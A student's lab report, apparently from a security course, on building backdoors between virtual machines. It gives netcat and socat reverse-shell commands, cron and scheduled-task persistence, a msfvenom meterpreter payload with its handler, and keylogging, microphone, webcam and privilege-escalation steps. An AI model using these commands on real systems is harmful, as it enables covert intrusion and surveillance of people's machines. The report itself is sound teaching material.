Exp2 后门原理与实践 20164309
?
準(zhǔn)備工作:
使用 ipconfig 查看win7虛擬機IP地址為:192.168.236.130
使用 ipconfig 查看linux虛擬機IP地址為:192.168.236.131
?
?
實驗內(nèi)容
?
一、使用nc或netcat遠程獲取shell
(1)win獲得Linux shell
1.windows打開監(jiān)聽
進入文件夾
cd netcat開始監(jiān)聽
ncat.exe -l -p 4309這里的 -l 是監(jiān)聽模式,-p是選擇監(jiān)聽的端口。
2. Linux反彈連接win
nc 192.168.236.130 4309 -e /bin/sh?
3.windows下獲得一個linux shell,可運行任何cmd指令,如ls
(2) Linux獲得Win Shell
1.Linux運行監(jiān)聽指令
nc -l -p 4309
2.Windows反彈連接Linux
ncat.exe -e cmd.exe 192.168.236.131 4309?
3.Linux下看到Windows的命令提示
可以發(fā)現(xiàn),linux端獲得了win的shell
?
(3) nc傳輸數(shù)據(jù)
1.在win端對4309端口進行監(jiān)聽
ncat.exe -l -p 43092.linux端連接到win端4309端口
nc 192.168.236.130 43093.傳輸通道建立,可以傳輸文字信息了
?
二、使用netcat獲取主機操作Shell,cron啟動
1.在Win端進行監(jiān)聽
ncat.exe -l -p 4309?2.使用crontab指令增加一條定時任務(wù)
crontab-ecrontab指令可以用于設(shè)置周期性被執(zhí)行的指令。該命令從標(biāo)準(zhǔn)輸入設(shè)備讀取指令,并將其存放于crontab文件中,以供之后讀取和執(zhí)行,"-e"表示編輯
3.添加指令令其定時反向連接
在最后添加一條定時連接win端口的指令
56 * * * * /bin/netcat 192.168.236.130 4309 -e /bin/sh表示每小時的第56分鐘連接IP為192.168.236.130的主機(即虛擬機win7端)的4309端口,具體時間可以自行設(shè)定,我這里為了方便選擇了兩分鐘之后的時間
稍等片刻,發(fā)現(xiàn)成功獲取win端的shell
三、使用socat獲取主機操作Shell, 任務(wù)計劃啟動
1.新建一個能運行socat的任務(wù)
?①搜索任務(wù)計劃程序,點擊進入
?
②點擊右側(cè)操作里的創(chuàng)建任務(wù),并命名為“20164309 socat”
③新建觸發(fā)器,設(shè)定為在鎖定時觸發(fā)
?
③新建操作,選定目標(biāo)程序路徑,并且添加參數(shù):
tcp-listen:4309 exec:cmd.exe,pty,stderr這個命令可以將cmd.exe綁定到4309端口,并且將cmd.exe的stderr重定向到stdout上
?
?我們可以看到,創(chuàng)建任務(wù)成功
2.觸發(fā)任務(wù),使其運行
使用Windows+l鎖定主機后,再解鎖,發(fā)現(xiàn)程序已經(jīng)運行
3.獲取shell
socat - tcp:192.168.236.130:4309這里的第一個參數(shù)-代表標(biāo)準(zhǔn)的輸入輸出,第二個流連接到Windows主機的4309端口。
在實現(xiàn)的時候我出現(xiàn)了一個問題:在tcp后多打了一個空格,卡了很久,不過好在成功了,大家引以為戒。
修改后發(fā)現(xiàn)已經(jīng)成功獲取cmd Shell:
四、使用MSF meterpreter生成可執(zhí)行文件,利用ncat或socat傳送到主機并運行獲取主機Shell
1.生成后門
在linux端使用msfvenom工具,生成后門:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.194 LPORT=4309 -f exe > 20164309_backdoor.exe 192.168.236.131其中-p 使用的payload,為有效載荷,就是被運輸有東西。這里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反彈回連的IP,即攻擊機linux的IP地址,LPORT是回連的端口,-f是生成文件的類型, >輸出到哪個文件
由于一開始沒有充分理解這里的ip地址的意義,我使用了被攻擊win端的地址,導(dǎo)致在之后使用后門的時候?qū)覍沂 =?jīng)過理解我發(fā)現(xiàn)這里的ip是被攻擊主機需要連接的地址,即為攻擊機linux端的地址。
2. 使用nc進行文件傳輸
需要在win端關(guān)閉殺軟和防火墻的條件下進行
①在win端進行監(jiān)聽
ncat.exe -lv 4309 > 20164309_backdoor.exe其中-lv表示可以觀察到連接狀態(tài)
?
?②在linux端傳輸文件
nc 192.168.236.130 4309 < 20164309_backdoor.exe發(fā)送文件在win端命令行顯示傳輸成功
的確傳輸成功了
?3.在msf端控制臺設(shè)置反彈回連
輸入
msfconsole進入控制臺(之后由于實驗屢次失敗我進入了這個界面不知道多少次。。。幸虧這里有一個小彩蛋,每次進入的界面大都和之前不一樣,也算是苦中作樂了吧)
use exploit/multi/handler設(shè)置payload
set payload windows/meterpreter/reverse_tcp使用生成后門程序時相同的payload
set LHOST 192.168.236.131這里需要與生成后門程序的主機IP相同
set LPORT 4309需要使用相同的端口
show options顯示選項
exploit進行監(jiān)聽
屢次嘗試,在糾正了剛剛說的那個錯誤后在win端運行了正確的后門
發(fā)現(xiàn)可以調(diào)用win端shell
五、使用MSF meterpreter(或其他軟件)生成獲取目標(biāo)主機音頻、攝像頭、擊鍵記錄等內(nèi)容,并嘗試提權(quán)
還有很多功能可以使用,我們一個一個試試吧
1.使用screenshot進行截屏,截屏得文件nQebvnBz.jpeg
2.使用keyscan_start指令開始記錄下?lián)翩I的過程,亂輸一通試試:
成功記錄
3.使用record_mic指令截獲一段音頻,文件名為qbucCKSm.wav
4.或者使用webcam_snap進行拍。。等等,為什么失敗了
發(fā)現(xiàn)無法進行拍照,看看排除一下原因,發(fā)現(xiàn):
貌似虛擬機無法調(diào)用內(nèi)置攝像頭
上網(wǎng)查查有什么解決的方法
???現(xiàn)在去買一個外置攝像頭也來不及了,忍痛割愛在自己主機上試試吧。。。
?按部就班地進行試驗:
查得ip地址為:192.168.6.194
傳輸后門
在linux準(zhǔn)備就緒后運行后門
發(fā)現(xiàn)可以拍照了,那多拍幾張選一張看得出生理特征的(比如眼鏡(???)),就決定是你了:hAcbeMwj,jpeg
?
5.繼續(xù)實驗嘗試提權(quán)
輸入getuid查看權(quán)限分組
輸入getsystem進行提權(quán)
發(fā)現(xiàn)在提權(quán)時遇到了一些問題,無法提權(quán)
有可能是win10賬號是管理員權(quán)限?那我再在win7虛擬機上嘗試一下普通用戶
還是失敗
再試試win7的管理員賬號
意想不到的是竟然成功了,希望大神們能幫忙解釋一下原理
?
基礎(chǔ)問題解答:
(1)?? 例舉你能想到的一個后門進入到你系統(tǒng)中的可能方式?
記得很久以前的三一五晚會曝光了一些手機APP擅自添加后門,導(dǎo)致巨大的財產(chǎn)損失的案例,那時候智能手機方興未艾,人們的安全意識也相對薄弱,但是現(xiàn)在這樣的事情還真實地發(fā)生在我們身邊;還有一些釣魚網(wǎng)站會誘導(dǎo)我們點擊下載一些后門程序,一旦程序運行就成了人為刀俎我為魚肉的情形了。
(2)?? 例舉你知道的后門如何啟動起來(win及linux)的方式?
后門可能會偽裝成正常的程序或軟件,誘導(dǎo)用戶使用,來獲取你的權(quán)限。
(3)?? Meterpreter有哪些給你映像深刻的功能?
遠程拍照功能。在之前bm管理概論的課程中我閱讀了《無處可藏》這本書,有一段令我印象深刻的細節(jié)是斯諾登筆記本電腦的攝像頭用膠帶封住了,當(dāng)時我還認為杞人憂天了,但是沒有想到這種技術(shù)門檻這么低。
(4)如何發(fā)現(xiàn)自己有系統(tǒng)有沒有被安裝后門?
對于我們來說最好的辦法就是經(jīng)常性的殺毒、及時更新系統(tǒng)、病毒庫以查找后門。在實驗中我還發(fā)現(xiàn)在進行遠程照相的時候我攝像頭旁邊的呼吸燈閃了一下,如果現(xiàn)實生活中遇到這種情況務(wù)必要注意了
?
實驗心得:
這次實驗最大的收獲就是明白了細節(jié)決定成敗。由于自己的粗心馬虎,這次實驗幾乎花了我兩個晚上才完成,每一步都要遇到一些或多或少地小問題。甚至一開始為了不注冊碼云賬號沒有使用老師的ncet而去網(wǎng)上下載了一個,導(dǎo)致在傳輸文件的時候出現(xiàn)問題;還有輸入socat命令的時候多打了一個空格,也導(dǎo)致無法順利調(diào)用shell;甚至在寫實驗報告的時候發(fā)現(xiàn)缺少關(guān)鍵的截圖而回過頭來臨時做臨時截的。在今后的實驗和學(xué)習(xí)乃至工作中,我一定要戒驕戒躁,時刻關(guān)注細節(jié),才能高質(zhì)量地完成任務(wù)。
?
轉(zhuǎn)載于:https://www.cnblogs.com/20164309-kx/p/10577470.html
總結(jié)
以上是生活随笔為你收集整理的Exp2 后门原理与实践 20164309的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Exp1 PC平台逆向破解 201643
- 下一篇: Exp3 免杀原理与实践 201643